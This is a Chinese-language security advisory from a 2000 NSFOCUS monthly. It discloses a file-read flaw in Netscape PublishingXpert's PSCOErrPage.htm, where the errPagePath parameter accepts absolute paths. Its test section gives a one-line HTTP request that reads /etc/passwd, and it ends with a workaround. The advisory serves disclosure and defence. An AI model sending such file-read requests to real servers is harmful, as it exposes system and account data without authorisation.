绿盟安全月刊->第8期->最新漏洞 Netscape PublishingXpert远程读取文件漏洞

作者：x00x00
日期：2000-04-12


发布日期: 2000-4-11
更新日期: 2000-4-11

受影响的系统:  
Netscape PublishingXpert 2.* PSCOErrPage.htm
+
  SunOS 5.7
  SunOS 5.6
  SunOS 5.5.1

--------------------------------------------------------------------------------
描述:


PSCOErrPage.htm是一个用来显示错误新的页面，当服务器发生一个错误时，通常你会
被转到类似这样的一个链接地址去：


/PSUser/PSCOErrPage.htm?errPagePath=%2Fusr%2FPublishingXpert%2F2.5%2Fbin%2Fp
suser%2Fen%2Fcommon%2FPSCO_ErrPage.pat&errMsg=PUBSYS_35202%3A++The+two+passw
ords+provided+do+not+match
这里的%2F就是"/"，去掉errMsg变量的内容（它显示错误信息内容).就得到下面一个链接：

/PSUser/PSCOErrPage.htm?errPagePath=/usr/PublishingXpert/2.5/bin/psuser/en/c
ommon/PSCO_ErrPage.pat

errPagePath使用了绝对路径，因此攻击者可以改变errPagePath的路径，浏览系统文
件。(只能以web服务器的运行权限浏览)

<* 来源： \x00\x00 (x00x00x00@hotmail.com) *>



--------------------------------------------------------------------------------
测试程序：


GET　/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd　HTTP/1.0




--------------------------------------------------------------------------------
建议:
临时解决方法：禁止使用PSCOErrPage.htm